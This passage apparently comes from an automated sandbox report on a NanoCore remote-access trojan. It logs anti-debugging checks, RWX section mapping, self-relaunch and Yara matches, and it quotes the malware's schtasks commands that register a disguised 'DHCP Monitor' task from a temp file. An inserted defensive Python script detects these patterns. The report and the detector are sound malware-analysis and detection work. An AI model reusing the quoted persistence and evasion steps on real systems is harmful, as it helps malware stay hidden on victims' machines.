      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe  Process information set: NOOPENFILEERRORBOX (76 identical entries)
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe  File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: C:\Users\user\Desktop\nanocore.exe  Thread delayed: delay time: 922337203685477
      Source: C:\Users\user\Desktop\nanocore.exe  Thread delayed: delay time: 922337203685477
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe  Thread delayed: delay time: 922337203685477
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe  Thread delayed: delay time: 922337203685477
      Source: C:\Users\user\Desktop\nanocore.exe  Window / User API: threadDelayed 4165
      Source: C:\Users\user\Desktop\nanocore.exe  Window / User API: threadDelayed 5343
      Source: C:\Users\user\Desktop\nanocore.exe  Window / User API: foregroundWindowGot 941
      Source: C:\Users\user\Desktop\nanocore.exe TID: 6304  Thread sleep time: -13835058055282155s >= -30000s
      Source: C:\Users\user\Desktop\nanocore.exe TID: 3136  Thread sleep count: 39 > 30
      Source: C:\Users\user\Desktop\nanocore.exe TID: 6792  Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 864  Thread sleep count: 42 > 30
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 4780  Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 7156  Thread sleep count: 41 > 30
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 7036  Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\conhost.exe  Last function: Thread delayed
      Source: C:\Windows\System32\conhost.exe  Last function: Thread delayed
      Source: C:\Users\user\Desktop\nanocore.exe Code function: 1_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA
      Source: C:\Users\user\Desktop\nanocore.exe Code function: 1_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose
      Source: C:\Users\user\Desktop\nanocore.exe Code function: 1_2_004026BC FindFirstFileA
      Source: C:\Users\user\Desktop\nanocore.exe Code function: 2_2_00404A29 FindFirstFileExW
      Source: C:\Users\user\Desktop\nanocore.exe Code function: 8_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA
      Source: C:\Users\user\Desktop\nanocore.exe Code function: 8_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose
      Source: C:\Users\user\Desktop\nanocore.exe Code function: 8_2_004026BC FindFirstFileA
      Source: C:\Users\user\Desktop\nanocore.exe Code function: 10_2_00404A29 FindFirstFileExW
      Source: C:\Users\user\Desktop\nanocore.exe Code function: 10_1_00404A29 FindFirstFileExW
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 11_2_00404A29 FindFirstFileExW
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 11_1_00404A29 FindFirstFileExW
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 13_2_00404A29 FindFirstFileExW
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 13_1_00404A29 FindFirstFileExW
      Source: C:\Users\user\Desktop\nanocore.exe Thread delayed: delay time: 922337203685477
      Source: C:\Users\user\Desktop\nanocore.exe Thread delayed: delay time: 922337203685477
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Thread delayed: delay time: 922337203685477
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Thread delayed: delay time: 922337203685477
      Source: nanocore.exe, 00000002.00000002.909912427.0000000006530000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: nanocore.exe, 00000002.00000002.909912427.0000000006530000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: nanocore.exe, 00000002.00000002.909912427.0000000006530000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: nanocore.exe, 00000002.00000002.909912427.0000000006530000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
      Source: C:\Users\user\Desktop\nanocore.exe Process information queried: ProcessInformation
      Source: C:\Users\user\Desktop\nanocore.exe Code function: 1_2_6FC71000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile
      Source: C:\Users\user\Desktop\nanocore.exe Code function: 1_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode
      Source: C:\Users\user\Desktop\nanocore.exe Code function: 1_2_02CB168F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\nanocore.exe Code function: 1_2_02CB18A7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\nanocore.exe Code function: 2_2_004035F1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\nanocore.exe Code function: 8_2_02CB168F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\nanocore.exe Code function: 8_2_02CB18A7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 9_2_0254168F mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 9_2_025418A7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\nanocore.exe Code function: 10_2_004035F1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\nanocore.exe Code function: 10_1_004035F1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 11_2_004035F1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 11_1_004035F1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 12_2_02B718A7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 12_2_02B7168F mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 13_2_004035F1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 13_1_004035F1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\nanocore.exe Code function: 2_2_004067FE GetProcessHeap
      Source: C:\Users\user\Desktop\nanocore.exe Process token adjusted: Debug
      Source: C:\Users\user\Desktop\nanocore.exe Code function: 2_2_00401E1D SetUnhandledExceptionFilter
      Source: C:\Users\user\Desktop\nanocore.exe Code function: 2_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
      Source: C:\Users\user\Desktop\nanocore.exe Code function: 2_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
      Source: C:\Users\user\Desktop\nanocore.exe Code function: 2_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
      Source: C:\Users\user\Desktop\nanocore.exe Code function: 10_2_00401E1D SetUnhandledExceptionFilter
      Source: C:\Users\user\Desktop\nanocore.exe Code function: 10_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
      Source: C:\Users\user\Desktop\nanocore.exe Code function: 10_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
      Source: C:\Users\user\Desktop\nanocore.exe Code function: 10_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
      Source: C:\Users\user\Desktop\nanocore.exe Code function: 10_1_00401E1D SetUnhandledExceptionFilter
      Source: C:\Users\user\Desktop\nanocore.exe Code function: 10_1_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
      Source: C:\Users\user\Desktop\nanocore.exe Code function: 10_1_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
      Source: C:\Users\user\Desktop\nanocore.exe Code function: 10_1_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 11_2_00401E1D SetUnhandledExceptionFilter
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 11_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 11_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 11_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 11_1_00401E1D SetUnhandledExceptionFilter
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 11_1_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 11_1_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 11_1_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 13_2_00401E1D SetUnhandledExceptionFilter
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 13_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 13_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 13_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 13_1_00401E1D SetUnhandledExceptionFilter
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 13_1_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 13_1_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 13_1_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
      Source: C:\Users\user\Desktop\nanocore.exe Memory allocated: page read and write | page guard

      HIPS / PFW / Operating System Protection Evasion:

      Contains functionality to prevent local Windows debugging
      Source: C:\Users\user\Desktop\nanocore.exe Code function: 1_2_6FC71000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile
      Source: C:\Users\user\Desktop\nanocore.exe Code function: 8_2_6EEC1000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 9_2_6EDA1000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Code function: 12_2_6F651000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile
      Maps a DLL or memory area into another process
      Source: C:\Users\user\Desktop\nanocore.exe Section loaded: unknown target: C:\Users\user\Desktop\nanocore.exe protection: execute and read and write
      Source: C:\Users\user\Desktop\nanocore.exe Section loaded: unknown target: C:\Users\user\Desktop\nanocore.exe protection: execute and read and write
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Section loaded: unknown target: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe protection: execute and read and write
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Section loaded: unknown target: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe protection: execute and read and write
      Source: C:\Users\user\Desktop\nanocore.exe Process created: C:\Users\user\Desktop\nanocore.exe 'C:\Users\user\Desktop\nanocore.exe'
      Source: C:\Users\user\Desktop\nanocore.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp38C1.tmp'
      Source: C:\Users\user\Desktop\nanocore.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp3B81.tmp'
      Source: C:\Users\user\Desktop\nanocore.exe Process created: C:\Users\user\Desktop\nanocore.exe C:\Users\user\Desktop\nanocore.exe 0
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
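      The process-creation entries above show the two behaviours a detection engineer would key on: schtasks.exe importing a task definition from a file in the user's temp directory (the sandbox's "Scheduled temp file as task from temp location" signature), and the sample re-launching its own image, which is the parent/child shape that accompanies the RWX "Section loaded" entries. The following Python is an added example, not part of the Joe Sandbox report and not NanoCore or Joe Sandbox code, showing how both patterns can be flagged from Sysmon-style process-creation events and then correlated by parent process. The event field names (ProcessId, ParentProcessId, Image, ParentImage, CommandLine) are assumed to follow Sysmon Event ID 1; the sample events and their PIDs are constructed by hand from the report's command lines, not exported from a sensor.

```python
"""Added example (not part of the Joe Sandbox report, and not NanoCore or Joe
Sandbox code): triage Sysmon-style process-creation events for a
'schtasks /create ... /xml <temp file>' registration and for a process that
re-launches its own image, then correlate both by parent process.

Assumed (constructed for this example): each event is a dict with the Sysmon
Event ID 1 fields ProcessId, ParentProcessId, Image, ParentImage and
CommandLine; the sample events and their PIDs below are hand-built from the
report's 'Process created' lines, not exported from a sensor.
"""
import re
from collections import defaultdict

# Directories from which a task definition XML is not normally imported.
TEMP_DIR_MARKERS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\", "\\temp\\")

# /xml <path>: the path may be in double quotes, in single quotes (the sandbox
# rewrites double quotes to single quotes in its listing) or unquoted.
_XML_ARG = re.compile(r"""/xml\s+(?:"([^"]+)"|'([^']+)'|(\S+))""", re.IGNORECASE)


def schtasks_xml_path(command_line):
    """Return the /xml argument of a 'schtasks /create' command line, else None."""
    if not re.search(r"/create\b", command_line, re.IGNORECASE):
        return None
    match = _XML_ARG.search(command_line)
    if match is None:
        return None
    return next(group for group in match.groups() if group)


def is_schtasks_from_temp(event):
    """schtasks.exe registering a task whose XML definition lives in a temp dir."""
    if not event["Image"].lower().endswith("\\schtasks.exe"):
        return False
    path = schtasks_xml_path(event["CommandLine"])
    return path is not None and any(m in path.lower() for m in TEMP_DIR_MARKERS)


def is_self_spawn(event):
    """Parent and child run the same image path (the self-relaunch shape above)."""
    return event["Image"].lower() == event["ParentImage"].lower()


def triage(events):
    """Return ({pid: [tags]}, [parent pids whose children show both behaviours])."""
    findings = {}
    tags_by_parent = defaultdict(set)
    for event in events:
        tags = []
        if is_schtasks_from_temp(event):
            tags.append("schtasks_xml_from_temp")
        if is_self_spawn(event):
            tags.append("self_spawn")
        if tags:
            findings[event["ProcessId"]] = tags
            tags_by_parent[event["ParentProcessId"]].update(tags)
    both = {"schtasks_xml_from_temp", "self_spawn"}
    correlated = sorted(pid for pid, seen in tags_by_parent.items() if both <= seen)
    return findings, correlated


def _event(pid, ppid, image, parent_image, command_line):
    return {"ProcessId": pid, "ParentProcessId": ppid, "Image": image,
            "ParentImage": parent_image, "CommandLine": command_line}


NANOCORE = r"C:\Users\user\Desktop\nanocore.exe"
SCHTASKS = r"C:\Windows\SysWOW64\schtasks.exe"
EXPLORER = r"C:\Windows\explorer.exe"

# Constructed sample: PIDs are invented; command lines follow the report.
SAMPLE_EVENTS = [
    _event(1001, 900, NANOCORE, EXPLORER, NANOCORE),
    _event(1002, 1001, NANOCORE, NANOCORE, "'" + NANOCORE + "' "),
    _event(1003, 1002, SCHTASKS, NANOCORE,
           r"'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp38C1.tmp'"),
    _event(1004, 1002, SCHTASKS, NANOCORE,
           r"'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp3B81.tmp'"),
    _event(1005, 1002, NANOCORE, NANOCORE, NANOCORE + " 0"),
    # Controls: a task imported from a non-temp path, and an ordinary child process.
    _event(1006, 950, SCHTASKS, r"C:\Windows\System32\cmd.exe",
           r'schtasks.exe /create /tn "Nightly Backup" /xml "C:\ProgramData\backup\task.xml"'),
    _event(1007, 900, r"C:\Windows\System32\notepad.exe", EXPLORER, "notepad.exe"),
]

if __name__ == "__main__":
    found, parents = triage(SAMPLE_EVENTS)
    for pid, tags in sorted(found.items()):
        print(pid, ", ".join(tags))
    print("parents whose children show persistence plus self-spawn:", parents)
```

      On the constructed sample the two schtasks children and the two self-relaunches are tagged individually, and the parent that spawned both kinds of child is reported as the correlated hit; the control events (a task imported from ProgramData, and notepad.exe under explorer.exe) produce nothing. In a real pipeline the temp-directory list and the self-spawn rule both need tuning, since some legitimate installers relaunch themselves and some management tools stage task XML in temp.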
      Source: nanocore.exe, 00000002.00000002.906510253.0000000002AE3000.00000004.00000001.sdmp Binary or memory string: Program Manager
      Source: nanocore.exe, 00000002.00000002.905490910.0000000000E60000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
      Source: nanocore.exe, 00000002.00000002.905490910.0000000000E60000.00000002.00000001.sdmp Binary or memory string: Progman
      Source: nanocore.exe, 00000002.00000002.909739780.0000000005A2D000.00000004.00000001.sdmp Binary or memory string: Program Managerp
      Source: nanocore.exe, 00000002.00000002.905490910.0000000000E60000.00000002.00000001.sdmp Binary or memory string: Progmanlock
      Source: nanocore.exe, 00000002.00000002.905801654.0000000002531000.00000004.00000001.sdmp Binary or memory string: Program Manager\9'
      Source: nanocore.exe, 00000002.00000002.909609083.000000000579C000.00000004.00000001.sdmp Binary or memory string: Program ManagerpJ
      Source: C:\Users\user\Desktop\nanocore.exe Code function: 2_2_0040208D cpuid
      Source: C:\Users\user\Desktop\nanocore.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\Desktop\nanocore.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\Desktop\nanocore.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Users\user\Desktop\nanocore.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\Desktop\nanocore.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\Desktop\nanocore.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\Desktop\nanocore.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Users\user\Desktop\nanocore.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\Desktop\nanocore.exe Code function: 2_2_00401B74 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
      Source: C:\Users\user\Desktop\nanocore.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Stealing of Sensitive Information:

      Yara detected Nanocore RAT
      Source: Yara match File source: 00000001.00000002.651116412.000000001EEC0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match File source: 0000000A.00000002.683529518.0000000000679000.00000004.00000020.sdmp, type: MEMORY
      Source: Yara match File source: 00000008.00000002.669624228.000000001EEC0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match File source: 0000000A.00000001.662848703.0000000000414000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match File source: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match File source: 00000002.00000002.909694649.00000000058B0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match File source: 0000000D.00000001.685346299.0000000000414000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match File source: 0000000A.00000002.684499268.00000000034FC000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match File source: 0000000D.00000002.703714772.00000000033F1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match File source: 0000000C.00000002.691295579.000000001ED80000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match File source: 0000000D.00000002.704559063.0000000004FA2000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match File source: 0000000B.00000002.683969306.00000000006FC000.00000004.00000020.sdmp, type: MEMORY
      Source: Yara match File source: 0000000D.00000002.703774283.000000000342C000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match File source: 0000000A.00000002.682558622.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match File source: 00000002.00000002.907930500.0000000004A92000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match File source: 0000000B.00000002.683128059.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match File source: 0000000B.00000002.686692380.0000000004922000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match File source: 00000009.00000002.671860077.000000001ED70000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match File source: 0000000D.00000002.702826612.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match File source: 00000002.00000002.905801654.0000000002531000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match File source: 00000002.00000002.904977643.0000000000598000.00000004.00000020.sdmp, type: MEMORY
      Source: Yara match File source: 0000000B.00000002.684652674.000000000330C000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match File source: 0000000B.00000002.686247080.00000000047F0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match File source: 0000000D.00000002.703409413.00000000006E7000.00000004.00000020.sdmp, type: MEMORY
      Source: Yara match File source: 0000000A.00000002.685817351.0000000004940000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match File source: 0000000A.00000002.684426343.00000000034C1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match File source: 00000002.00000001.645917465.0000000000414000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match File source: 00000002.00000002.907047589.0000000004970000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match File source: 0000000D.00000002.704356267.0000000004910000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match File source: 0000000B.00000001.663544913.0000000000414000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara match File source: 0000000A.00000002.686102213.00000000049C2000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match File source: 0000000B.00000002.684614120.00000000032D1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match File source: 00000002.00000002.906581049.00000000035AC000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match File source: 0000000D.00000003.685637337.0000000000711000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match File source: Process Memory Space: dhcpmon.exe PID: 5752, type: MEMORY
      Source: Yara match File source: Process Memory Space: dhcpmon.exe PID: 6152, type: MEMORY
      Source: Yara match File source: Process Memory Space: nanocore.exe PID: 7064, type: MEMORY
      Source: Yara match File source: Process Memory Space: nanocore.exe PID: 7104, type: MEMORY
      Source: Yara match File source: Process Memory Space: nanocore.exe PID: 4108, type: MEMORY
      Source: Yara match File source: Process Memory Space: nanocore.exe PID: 5904, type: MEMORY
      Source: Yara match File source: Process Memory Space: dhcpmon.exe PID: 6724, type: MEMORY
      Source: Yara match File source: Process Memory Space: dhcpmon.exe PID: 6704, type: MEMORY
      Source: Yara match File source: 10.1.nanocore.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara match File source: 11.2.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara match File source: 1.2.nanocore.exe.1eed1458.5.unpack, type: UNPACKEDPE
      Source: Yara match File source: 10.2.nanocore.exe.696a10.2.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 11.2.dhcpmon.exe.33531ec.6.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 11.2.dhcpmon.exe.4920000.9.unpack, type: UNPACKEDPE
      Source: Yara match File source: 8.2.nanocore.exe.1eec0000.5.unpack, type: UNPACKEDPE
      Source: Yara match File source: 11.2.dhcpmon.exe.32d5530.4.unpack, type: UNPACKEDPE
      Source: Yara match File source: 1.2.nanocore.exe.1eec0000.4.unpack, type: UNPACKEDPE
      Source: Yara match File source: 13.2.dhcpmon.exe.4910000.8.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 9.2.dhcpmon.exe.1ed81458.5.raw.unpack, type: UNPACKEDPE
      Source: Yara match File source: 13.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPE
      Source: Yara match File source: 13.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara match File source: 13.2.dhcpmon.exe.4910000.8.unpack, type: UNPACKEDPE
